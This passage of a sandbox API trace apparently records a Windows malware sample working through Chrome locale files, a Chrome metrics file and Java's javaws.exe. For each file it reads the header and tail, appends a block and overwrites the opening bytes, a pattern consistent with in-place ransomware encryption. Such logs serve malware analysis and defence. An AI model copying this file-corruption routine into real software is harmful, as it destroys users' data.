lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.604] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0118.604] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.605] CloseHandle (hObject=0x1cc) returned 1 [0118.605] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fr.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0118.606] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.606] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x55a6c [0118.606] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.606] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.606] ReleaseMutex (hMutex=0x168) returned 1 [0118.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fr.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0118.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fr.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fr.pak", lpUsedDefaultChar=0x0) returned 6 [0118.607] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0118.616] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x54a6c [0118.616] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.633] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x54a6c [0118.633] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.634] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0118.634] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.634] CloseHandle (hObject=0x1cc) returned 1 [0118.634] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ja.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ja.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0118.635] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.635] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x5f8fa [0118.636] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.636] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.636] ReleaseMutex (hMutex=0x168) returned 1 [0118.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ja.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0118.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ja.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ja.pak", lpUsedDefaultChar=0x0) returned 6 [0118.636] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0118.664] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5e8fa [0118.664] ReadFile (in: hFile=0x1cc, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.709] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5e8fa [0118.709] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.709] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0118.709] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.710] CloseHandle (hObject=0x1cc) returned 1 [0118.734] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nb.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\nb.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0118.734] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.735] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x487e4 [0118.735] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.735] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.735] ReleaseMutex (hMutex=0x168) returned 1 [0118.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nb.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0118.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nb.pak", cchWideChar=6, lpMultiByteStr=0x1f7a9fc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nb.pak", lpUsedDefaultChar=0x0) returned 6 [0118.735] ReadFile (in: hFile=0x20c, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0118.764] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x477e4 [0118.765] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.770] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x477e4 [0118.771] WriteFile (in: hFile=0x20c, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.771] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0118.771] WriteFile (in: hFile=0x20c, lpBuffer=0x28aba08*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28aba08*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.772] CloseHandle (hObject=0x20c) returned 1 [0118.772] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sl.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sl.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0118.773] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.773] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4bb7e [0118.774] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.774] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.774] ReleaseMutex (hMutex=0x168) returned 1 [0118.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sl.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0118.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sl.pak", cchWideChar=6, lpMultiByteStr=0x1f7accc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sl.pak", lpUsedDefaultChar=0x0) returned 6 [0118.774] ReadFile (in: hFile=0x20c, lpBuffer=0x2897978, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2897978*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0118.781] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4ab7e [0118.781] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.793] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4ab7e [0118.793] WriteFile (in: hFile=0x20c, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.795] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0118.795] WriteFile (in: hFile=0x20c, lpBuffer=0x289f9a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x289f9a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.795] CloseHandle (hObject=0x20c) returned 1 [0118.795] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\uk.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\uk.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0118.796] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.796] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x7e1bc [0118.796] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.796] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.797] ReleaseMutex (hMutex=0x168) returned 1 [0118.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uk.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0118.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uk.pak", cchWideChar=6, lpMultiByteStr=0x1f7accc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uk.pak", lpUsedDefaultChar=0x0) returned 6 [0118.797] ReadFile (in: hFile=0x20c, lpBuffer=0x2897978, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2897978*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0118.826] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7d1bc [0118.827] ReadFile (in: hFile=0x20c, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.829] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7d1bc [0118.830] WriteFile (in: hFile=0x20c, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.830] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0118.830] WriteFile (in: hFile=0x20c, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.831] CloseHandle (hObject=0x20c) returned 1 [0118.831] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0118.832] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.832] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x442a [0118.832] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.832] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.832] ReleaseMutex (hMutex=0x168) returned 1 [0118.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="logo.png", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0118.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="logo.png", cchWideChar=8, lpMultiByteStr=0x1f735ec, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="logo.png", lpUsedDefaultChar=0x0) returned 8 [0118.832] ReadFile (in: hFile=0x20c, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.867] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x342a [0118.867] ReadFile (in: hFile=0x20c, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.873] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x342a [0118.873] WriteFile (in: hFile=0x20c, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.873] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0118.873] WriteFile (in: hFile=0x20c, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0118.874] CloseHandle (hObject=0x20c) returned 1 [0118.874] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\20170605115313.pma" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\setupmetrics\\20170605115313.pma"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0118.875] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.875] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1ab8 [0118.875] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.875] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.875] ReleaseMutex (hMutex=0x168) returned 1 [0118.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="20170605115313.pma", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0118.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="20170605115313.pma", cchWideChar=18, lpMultiByteStr=0x1f88a64, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="20170605115313.pma", lpUsedDefaultChar=0x0) returned 18 [0118.875] ReadFile (in: hFile=0x20c, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1ab8, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2fdf2bc*=0x1ab8, lpOverlapped=0x0) returned 1 [0118.903] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0118.903] WriteFile (in: hFile=0x20c, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x2040, lpOverlapped=0x0) returned 1 [0118.904] CloseHandle (hObject=0x20c) returned 1 [0118.904] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javaws.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaws.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0118.907] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.907] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x409a8 [0118.907] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.908] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.908] ReleaseMutex (hMutex=0x168) returned 1 [0118.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0118.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.exe", cchWideChar=10, lpMultiByteStr=0x1f735ec, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javaws.exe", lpUsedDefaultChar=0x0) returned 10 [0118.908] ReadFile (in: hFile=0x20c, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0118.925] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3f9a8 [0118.925] ReadFile (in: hFile=0x20c, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.931] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3f9a8 [0118.931] WriteFile (in: hFile=0x20c, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 